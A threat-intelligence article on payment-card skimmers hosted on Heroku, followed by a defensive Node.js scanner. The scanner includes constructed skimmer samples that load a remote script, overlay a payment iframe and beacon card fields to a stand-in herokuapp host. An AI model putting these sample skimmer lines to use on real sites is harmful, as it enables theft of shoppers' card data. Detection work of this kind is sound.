Payment card skimmer operators used Heroku, a cloud platform owned by Salesforce, to host their skimmer infrastructure and deliver it to targeted third-party merchant sites.
Jérôme Segura, director of threat intelligence at security provider Malwarebytes, found a rash of skimmers hosted on Heroku last Wednesday. According to him, the attackers used the platform both to host their skimmer scripts and to collect the stolen credit card data. Segura said that once the abuse was detected, Heroku administrators quickly suspended the accounts and removed the skimmers. Heroku is a platform-as-a-service (PaaS) cloud provider that supports both business and consumer projects, and users can experiment with its freemium tier subject to certain limitations.
Injected into merchant sites via free Heroku accounts
Segura wrote in his post last Wednesday,
“We will likely continue to observe Web skimmers abusing more cloud services as they are a cheap (even free) commodity they can discard when finished using it.”
Specifically, he documented four free Heroku accounts hosting scripts that targeted four third-party merchants:
- stark-gorge-44782[.]herokuapp[.]com used against shopping site correcttoes[.]com
- ancient-savannah-86049[.]herokuapp[.]com/configration.js used against panafoto[.]com
- pure-peak-91770[.]herokuapp[.]com/intregration.js used against alashancashmere[.]com
- aqueous-scrubland-51318[.]herokuapp[.]com/configuration.js used against amapur[.]de
iframe trick
The first component of this web skimming kit is the loader that sets up the iframe trick. A single line of code injected into the compromised merchant site loads a remote piece of JavaScript hosted on Heroku. That script inspects the current browser URL and only loads the next component when the URL contains the keyword "checkout", which the skimmer stores Base64-encoded as Y2hlY2tvdXQ= rather than in plain text.
The second component is a rogue iframe that overlays the legitimate payment form in order to harvest the victim's credit card data. To make the fake form blend in, the criminals reuse the same cascading style sheet (CSS) as the genuine form, loaded from portal.apsclicktopay.com/css/build/easypay.min.css.
The third component is the exfiltration mechanism, which sends the stolen data back to the attacker-controlled Heroku app in encoded form. The victim is then shown an error message instructing them to reload the page; by the time it appears, the card data has already been stolen.
Vanilla skimming
In one case, Malwarebytes found that the threat actors had apparently forgotten to obfuscate their code. What remains is vanilla skimming: the script looks for specific payment form fields, collects their values into an object and encodes it for exfiltration with window.btoa(JSON.stringify(result)).
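To make the three stages described above and the unobfuscated variant concrete from the defender's side, here is an added example (not code from Malwarebytes, Heroku or the skimmer operators): a Node.js scanner that flags the indicators this article describes in a script body (a Base64-hidden "checkout" gate, a second stage pulled from a *.herokuapp.com subdomain, an overlay iframe, and btoa(JSON.stringify()) encoding) and a decoder for an intercepted payload. The sample scripts, the hostname example-skimmer-00000.herokuapp.com and the card data are constructed for this example; the keyword list and the image-beacon transport check are assumptions, not details from the report.

```javascript
// Added example (not code from the Malwarebytes report or from Heroku):
// a static indicator scanner for the skimmer traits described in the article
// and a decoder for an intercepted btoa(JSON.stringify(result)) payload.
// Runs under Node.js; every sample script and payload below is constructed.

// URL keywords a checkout-gated skimmer might hide in Base64 (assumption).
const GATE_KEYWORDS = ['checkout', 'onepage', 'payment', 'billing'];

// Decode a candidate Base64 literal. Accept it only if it is genuine Base64
// (re-encodes to itself) and yields printable ASCII, so ordinary identifiers
// such as 'script' or 'total' are rejected.
function decodeBase64Literal(literal) {
  const buf = Buffer.from(literal, 'base64');
  if (buf.toString('base64') !== literal) return null;
  const text = buf.toString('utf8');
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Scan one script body and return an array of { id, evidence } findings.
function scanScript(source) {
  const findings = [];
  const add = (id, evidence) => findings.push({ id, evidence });

  // 1. Second stage fetched from a *.herokuapp.com subdomain
  const heroku = /https?:\/\/[a-z0-9-]+\.herokuapp\.com\/[^\s'"]*/gi;
  for (const m of source.matchAll(heroku)) add('heroku-remote-script', m[0]);

  // 2. Gate keyword hidden in Base64, e.g. 'Y2hlY2tvdXQ=' -> "checkout"
  const b64 = /['"]([A-Za-z0-9+/]{4,}={0,2})['"]/g;
  for (const m of source.matchAll(b64)) {
    const text = decodeBase64Literal(m[1]);
    if (text && GATE_KEYWORDS.some((k) => text.toLowerCase().includes(k))) {
      add('b64-url-keyword', `${m[1]} -> ${text}`);
    }
  }

  // 3. atob() output compared against the current page URL
  if (/atob\(/.test(source) && /location/.test(source)) {
    add('atob-location-gate', 'atob() used together with location');
  }

  // 4. Rogue iframe positioned over the real payment form
  if (/createElement\(['"]iframe['"]\)|<iframe/i.test(source) &&
      /position\s*:\s*(absolute|fixed)|z-index/i.test(source)) {
    add('overlay-iframe', 'iframe with absolute/fixed positioning');
  }

  // 5. Unobfuscated exfil encoding seen in the "vanilla" sample
  if (/btoa\(\s*JSON\.stringify\(/.test(source)) {
    add('btoa-json-exfil', 'btoa(JSON.stringify(...))');
  }

  // 6. Image-beacon transport for the encoded payload (heuristic, assumed)
  if (/new\s+Image\(\)/.test(source) && /\.src\s*=/.test(source)) {
    add('image-beacon-exfil', 'new Image().src = ...');
  }
  return findings;
}

// Reverse btoa(JSON.stringify(result)). A payload carried in a query string
// is URL-encoded on the wire, so undo that before the Base64 step.
function decodeExfil(payload) {
  const b64 = decodeURIComponent(payload);
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Constructed samples modelled on the stages described in the article.
const LOADER_SAMPLE =
  "if(window.location.href.indexOf(atob('Y2hlY2tvdXQ='))>-1){" +
  "var s=document.createElement('script');" +
  "s.src='https://example-skimmer-00000.herokuapp.com/configuration.js';" +
  "document.head.appendChild(s);}";
const OVERLAY_SAMPLE =
  "var f=document.createElement('iframe');" +
  "f.src='https://example-skimmer-00000.herokuapp.com/form.html';" +
  "f.style.cssText='position:absolute;top:0;left:0;z-index:9999;border:0';" +
  "document.querySelector('#payment-form').appendChild(f);";
const VANILLA_SAMPLE =
  "var result={};['cc_number','cc_exp','cc_cvv'].forEach(function(n){" +
  "var e=document.querySelector('[name=\"'+n+'\"]');if(e)result[n]=e.value;});" +
  "new Image().src='https://example-skimmer-00000.herokuapp.com/collect?d='+" +
  "window.btoa(JSON.stringify(result));";
const BENIGN_SAMPLE =
  "document.getElementById('total').textContent='Total: '+(2*19.99).toFixed(2);";

// Constructed payload, built the way the vanilla skimmer builds it
// (Buffer stands in for window.btoa outside the browser; test PAN only).
const SAMPLE_EXFIL = encodeURIComponent(Buffer.from(JSON.stringify({
  cc_number: '4111111111111111', cc_exp: '12/25', cc_cvv: '123',
})).toString('base64'));

const SAMPLES = { LOADER_SAMPLE, OVERLAY_SAMPLE, VANILLA_SAMPLE, BENIGN_SAMPLE };
for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, scanScript(src).map((f) => f.id));
}
console.log('decoded exfil:', decodeExfil(SAMPLE_EXFIL));
```

The Base64 round-trip check is what keeps the keyword rule quiet on normal code: most quoted identifiers are not a multiple of four characters or decode to non-printable bytes, so only deliberately encoded strings such as Y2hlY2tvdXQ= are reported. Any single finding is weak on its own; the combination of a Heroku-hosted second stage, a hidden URL gate and an encoded beacon is what should trigger a closer look at a merchant page.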